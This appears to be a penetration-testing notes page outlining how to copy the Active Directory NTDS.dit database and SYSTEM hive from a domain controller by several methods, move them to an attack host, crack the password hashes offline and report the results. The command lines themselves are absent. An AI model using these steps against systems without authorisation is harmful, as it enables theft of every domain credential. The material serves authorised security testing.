Attacking NTDS
By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit
of a domain controller. The .dit stands for directory information tree.
Alternative #1: vssadmin (locally)
1. Connecting to a DC with Evil-WinRM
2. Checking Local Group Membership
3. Checking User Account Privileges including Domain
4. Creating Shadow Copy of C: We can use vssadmin to create a Volume Shadow Copy (VSS) of the C: drive or whatever volume the admin chose when initially installing AD. It is very likely that NTDS will be stored on C: as that is the default location selected at install.
Results:
5. Copying NTDS.dit from the VSS: We can then copy the NTDS.dit file from the volume shadow copy of C: onto another location on the drive to prepare to move NTDS.dit to our attack host.
6. We will also need either the SYSTEM hive or bootkey is required for local parsing. So let's save the system hive
7. Transfer file to attacking machine. For instance, with smbserver.py from impacket.
8. Extract and crack ntds.dit locally:
Alternative #2: crackmapexec (remotely)
Cracking a Single Hash with Hashcat
Alternative #3: DSInternals
module (locally)
The DSInternals Framework exposes several internal features of Active Directory and can be used from any .NET application.
Installation
Since PowerShell 5, you can install the DSInternals module directly from the official PowerShell Gallery by running the following command:
The DSInternals PowerShell Module can also be installed using the official Chocolatey package by executing the following Chocolatey command:
This package is self-contained and it will also install all dependencies.
Commands to Extract the NTDS file + Boot Key
Alternative #4: Robocopy (locally)
The built-in utility robocopy can be used to copy files in backup mode as well. Robocopy is a command-line directory replication tool. It can be used to create backup jobs and includes features such as multi-threaded copying, automatic retry, the ability to resume copying, and more.
Robocopy differs from the copy
command in that instead of just copying all files, it can check the destination directory and remove files no longer in the source directory.
Cracking ntds file
secretsdump.py
We will need either the SYSTEM hive or bootkey:
Domain Password Analysis
Once we have extracted the NTDS database we can perform offline password cracking.
We can use a tool such as DPAT to perform a domain password analysis.
Our analysis can be included in the appendices of the report with metrics such as: - Number of password hashes obtained - Number of password hashes cracked - Percent of password hashes cracked - Top 10 passwords - Password length breakdown - Number of Domain Admin passwords cracked - Number of Enterprise Admin passwords cracked
Last update: 2025-05-18 Created: January 18, 2025 19:59:20